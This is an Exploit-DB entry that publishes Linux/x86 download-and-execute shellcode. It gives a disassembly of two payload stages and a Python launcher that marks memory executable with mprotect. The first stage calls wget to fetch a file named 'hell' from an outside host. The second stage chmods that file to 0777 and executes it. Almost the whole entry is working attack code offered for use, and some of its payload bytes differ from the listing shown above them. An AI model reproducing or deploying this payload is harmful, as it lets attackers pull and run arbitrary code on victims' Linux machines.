- 18 Dec 2022
- EDB-ID: 37365
- EDB verification: Passed
- Author: B3MB4M
- Vulnerability type: SHELLCODE
- Platform: LINUX_X86
- CVE: N/A
- Publication date: 2015-06-24
Linux/x86 - Download File + Execute Shellcode
Linux/x86 Download&Execute
------WE ARE BOMBERMANS----
#Greetz : Bomberman(Leader)
#Author : B3mB4m
#Just the two of us LOL.
Info!
This shellcode has two parts, because using fork in asm causes problems in the shellcode.
So run the two parts from separate processes (multiprocessing) instead,
if you don't want problems while running the shellcodes.
I did not calculate the byte length, because it depends entirely on the URL length.
TESTED ON : Ubuntu 14.04
/*
The NX bit prevents random data from being executed on modern processors and OSes.
To get around it, call mprotect.
You should also define your shellcode as a binary instead of a character string.
-By Philipp Hagemeister
Emmy goes to Philipp Hagemeister ! ! (clap clap clap clap)
Special thanks :) ..
*/
;https://github.com/b3mb4m/Shellcode/blob/master/Auxiliary/convertstack.py
;Use it to convert a string into the equivalent stack pushes.
#Remote file download#
08048060 <.text>:
8048060: 31 c0 xor %eax,%eax
8048062: 50 push %eax
8048063: 68 68 65 6c 6c push $0x6c6c6568
8048068: 68 62 34 6d 2f push $0x2f6d3462
804806d: 68 2f 62 33 6d push $0x6d33622f
8048072: 68 6d 2f 2f 2f push $0x2f2f2f6d
8048077: 68 73 2e 63 6f push $0x6f632e73
804807c: 68 78 69 6d 61 push $0x616d6978
8048081: 68 33 2e 6d 65 push $0x656d2e33 ;3.meximas.com/b3mb4m/hell
8048086: 89 e1 mov %esp,%ecx
8048088: 50 push %eax
8048089: 68 77 67 65 74 push $0x74656777
804808e: 68 62 69 6e 2f push $0x2f6e6962
8048093: 68 75 73 72 2f push $0x2f727375
8048098: 68 2f 2f 2f 2f push $0x2f2f2f2f
804809d: 89 e3 mov %esp,%ebx
804809f: 50 push %eax
80480a0: 50 push %eax
80480a1: 51 push %ecx
80480a2: 53 push %ebx
80480a3: 89 e1 mov %esp,%ecx
80480a5: b0 0b mov $0xb,%al
80480a7: cd 80 int $0x80
80480a9: 31 c0 xor %eax,%eax
80480ab: fe c0 inc %al
80480ad: cd 80 int $0x80
#Download&Chmod777&Execute
08048060 <.text>:
8048060: 31 c0 xor %eax,%eax
8048062: 31 c9 xor %ecx,%ecx
8048064: 50 push %eax
8048065: 68 68 65 6c 6c push $0x6c6c6568 ;file name(hell)
804806a: b0 0f mov $0xf,%al
804806c: 89 e3 mov %esp,%ebx
804806e: 66 b9 ff 01 mov $0x1ff,%cx
8048072: cd 80 int $0x80
8048074: 31 c0 xor %eax,%eax
8048076: 50 push %eax
8048077: 89 e2 mov %esp,%edx
8048079: 53 push %ebx
804807a: 89 e1 mov %esp,%ecx
804807c: b0 0b mov $0xb,%al
804807e: cd 80 int $0x80
Then back to Python.
#!/usr/bin/python
import ctypes
import multiprocessing
import time


def download(firstone="Capture"):
    if firstone != "Capture":
        # Part 1: execve("////usr/bin/wget", ["////usr/bin/wget", "3.meximas.com////b3mb4m/hell"]), then exit.
        shellcode_data = (b"\x31\xc0\x50\x68\x68\x65\x6c\x6c\x68\x62\x34\x6d\x2f\x68\x2f\x62"
                          b"\x33\x6d\x68\x6d\x2f\x2f\x2f\x68\x73\x2e\x63\x6f\x68\x78\x69\x6d\x61\x68\x33\x2e"
                          b"\x6d\x65\x89\xe1\x50\x68\x77\x67\x65\x74\x68\x62\x69\x6e\x2f\x68\x75\x73\x72\x2f"
                          b"\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x50\x51\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\xfe"
                          b"\xc0\xcd\x80")
    else:
        time.sleep(30)  # Time delay; depends on your file size.
        # Part 2: chmod("hell", 0777) and execve("hell", ["hell"], envp).
        # (Differs from the listing above: no xor %ecx,%ecx and no mov %esp,%edx.)
        shellcode_data = (b"\x31\xc0\x50\x68\x68\x65\x6c\x6c\xb0\x0f\x89\xe3\x66\xb9\xff\x01"
                          b"\xcd\x80\x31\xc0\x50\x53\x89\xe1\xb0\x0b\xcd\x80")
    shellcode = ctypes.c_char_p(shellcode_data)
    function = ctypes.cast(shellcode, ctypes.CFUNCTYPE(None))
    addr = ctypes.cast(function, ctypes.c_void_p).value
    libc = ctypes.CDLL('libc.so.6')
    libc.mprotect.argtypes = [ctypes.c_void_p, ctypes.c_size_t, ctypes.c_int]
    pagesize = libc.getpagesize()
    addr_page = (addr // pagesize) * pagesize
    # NX: the bytes sit in a non-executable heap page, so mark every page they span RWX (0x7).
    for page_start in range(addr_page, addr + len(shellcode_data), pagesize):
        assert libc.mprotect(page_start, pagesize, 0x7) == 0
    function()


if __name__ == "__main__":
    # Two processes instead of fork() inside the shellcode: the first runs wget,
    # the second waits for the download to finish, then chmods and executes the file.
    for x in range(0, 2):
        if x == 0:
            first = multiprocessing.Process(target=download, args=("KnockKnock",))
        else:
            first = multiprocessing.Process(target=download)
        first.start()
#Bomberman Team presented !!
- Source: www.exploit-db.com